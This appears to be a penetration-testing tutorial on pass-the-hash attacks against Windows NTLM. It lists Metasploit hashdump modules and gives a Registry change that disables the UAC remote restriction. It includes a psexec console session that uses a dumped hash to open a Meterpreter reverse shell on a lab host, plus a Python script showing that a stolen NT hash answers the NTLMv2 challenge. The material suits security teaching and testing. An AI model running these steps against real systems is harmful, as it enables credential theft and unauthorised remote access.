Sometimes a password is too long or complex to crack in any reasonable time. In that case you can try to pass the hash instead. In this type of attack, when you log on to the target operating system or application, you provide the user name and the stored hash of the password rather than the password itself. On Windows this works because NTLM authentication uses the NT hash as the key for the challenge-response exchange, so the hash is password-equivalent. You obtain the hash by inducing the operating system or application to dump it from RAM (for example LSASS memory), from the Windows Registry (the SAM hive), or from a credentials file. Metasploit has many hashdump-related modules you can use against Linux, Windows, applications, and other platforms. Most of them are post modules you run after you have compromised the target and obtained a Meterpreter prompt. Here are a few for collecting hashes:
- post/windows/gather/smart_hashdump
- post/linux/gather/hashdump
- post/pro/multi/gather/hashdump
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/mcafee_vse_hashdump
Note: To obtain a complete list of hashdump-related Metasploit modules, run a search at the Metasploit console, for example: search hash platform:windows
Once you have the hashes, there are several tools you can use to test whether they are still valid, to pass them, or to crack them, including:
- Metasploit modules auxiliary/scanner/smb/smb_login (tests whether a hash is accepted on one or many hosts; its SMBPass option takes a hash as well as a password) and exploit/windows/smb/psexec (uses the hash to get a shell)
Passing the hash does not work in all cases. Windows Defender Credential Guard, for example, uses virtualization-based security to isolate the LSASS secrets of domain accounts (NTLM hashes and Kerberos tickets), so hashdump-style tools cannot read those hashes from memory on a host where it is enabled, and you will not harvest a domain hash to pass from that host. Credential Guard is a separate feature from Windows Defender antivirus and cannot simply be stopped like an AV service; turning it off requires administrative changes to the host's virtualization-based security configuration (see the note below). Note that it protects domain credentials held in LSASS, not the local account hashes stored in the SAM.
Separately, the target may need a Registry change. Starting with Windows Vista, User Account Control (UAC) remote restrictions strip administrative privileges from the token of any local administrator account other than the built-in Administrator (RID 500) when it authenticates over the network, so passing the hash of another local admin gets you a logon but not the privileged access that psexec needs. If you already have administrative access to the target, you can disable this restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and creating a DWORD value named LocalAccountTokenFilterPolicy set to 1. Domain accounts are not subject to this filter.
Note: For information about disabling Windows Defender Credential Guard, see https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage.
Note: For an interesting article on disabling the LocalAccountTokenFilterPolicy, see http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/
Let's use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute-force the plaintext password. This is a "feature" of NTLM authentication that current Windows versions still carry, not only older ones: any host that accepts NTLM will accept the hash in place of the password.
See Also: https://security.stackexchange.com/questions/141681/can-an-intruder-still-possibly-succeed-with-pass-the-hash-or-pass-the-ticket-on
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.16.30.88   # The DATABASE host
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass TheHashedPassword   # The dumped hash, supplied as LMHASH:NTHASH
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 172.16.20.55   # Security-Desk
msf6 exploit(windows/smb/psexec) > set LPORT 4445   # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller
msf6 exploit(windows/smb/psexec) > exploit -j
msf6 exploit(windows/smb/psexec) > sessions
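Why the plaintext is never needed, as an added example that is not part of the original page or of Metasploit: the script below computes the NT hash (MD4 over the UTF-16LE password, the value hashdump prints) and the NTLMv2 challenge response defined in MS-NLMP, then shows that a client holding only a dumped hash produces exactly the response a client holding the password produces, and that the target verifies it against its own stored hash. It also builds the LMHASH:NTHASH string that the SMBPass option expects. The hashdump line, account, server challenge and client blob are constructed for the demo (the demo account's password is "password"); MD4 is implemented in pure Python because OpenSSL 3 builds often disable it in hashlib.

```python
"""Pass-the-hash mechanics: NTLM needs the NT hash, not the password (added example)."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF

# Constructed hashdump output for the demo account; its password is "password".
# Format: user:RID:LMHASH:NTHASH:::  (LM hash here is the well-known empty-LM value)
HASHDUMP_LINE = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), since hashlib.new('md4') is often unavailable."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                            # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 3
            a = _rotl((a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0 = (a0 + a) & MASK32, (b0 + b) & MASK32
        c0, d0 = (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. This is what hashdump prints as NTHASH."""
    return md4(password.encode("utf-16-le"))


def parse_hashdump_line(line: str):
    """Split a hashdump line into (user, rid, lmhash_hex, nthash_hex)."""
    user, rid, lm, nt, *_ = line.split(":")
    return user, int(rid), lm, nt


def smbpass_value(lm_hex: str, nt_hex: str) -> str:
    """Format a dumped hash the way Metasploit's SMBPass option takes it."""
    return f"{lm_hex}:{nt_hex}"


def ntlmv2_response(nt: bytes, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """MS-NLMP NTLMv2 response. The only secret involved is the NT hash."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    nt_proof = hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def demo_pass_the_hash() -> dict:
    """Password-holding client vs hash-only attacker vs the verifying server."""
    user, domain = "Administrator", "DATABASE"
    server_challenge = bytes.fromhex("0123456789abcdef")          # constructed
    # Minimal constructed "temp" blob: version bytes, zero timestamp, client nonce, no AV pairs
    blob = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + bytes.fromhex("a1b2c3d4e5f60718") + b"\x00" * 8

    # Legitimate client knows the password and derives the NT hash from it.
    from_password = ntlmv2_response(nt_hash("password"), user, domain, server_challenge, blob)
    # Attacker never learns the password; only the dumped hash line.
    _, _, lm_hex, nt_hex = parse_hashdump_line(HASHDUMP_LINE)
    stolen_nt = bytes.fromhex(smbpass_value(lm_hex, nt_hex).split(":")[1])
    from_hash = ntlmv2_response(stolen_nt, user, domain, server_challenge, blob)
    # Server stores the same NT hash and recomputes NtProofStr (first 16 bytes) to verify.
    stored_nt = nt_hash("password")
    expected = ntlmv2_response(stored_nt, user, domain, server_challenge, blob)[:16]
    return {
        "same_response": from_password == from_hash,
        "server_accepts": hmac.compare_digest(from_hash[:16], expected),
    }


if __name__ == "__main__":
    print("SMBPass value:", smbpass_value(*parse_hashdump_line(HASHDUMP_LINE)[2:]))
    print(demo_pass_the_hash())
```

The same NT hash that the legitimate client derives from its password is what the server stores and what hashdump extracts, so whoever holds it can complete the exchange. Cracking only matters if you need the plaintext for something other than NTLM, for example a service that takes the actual password.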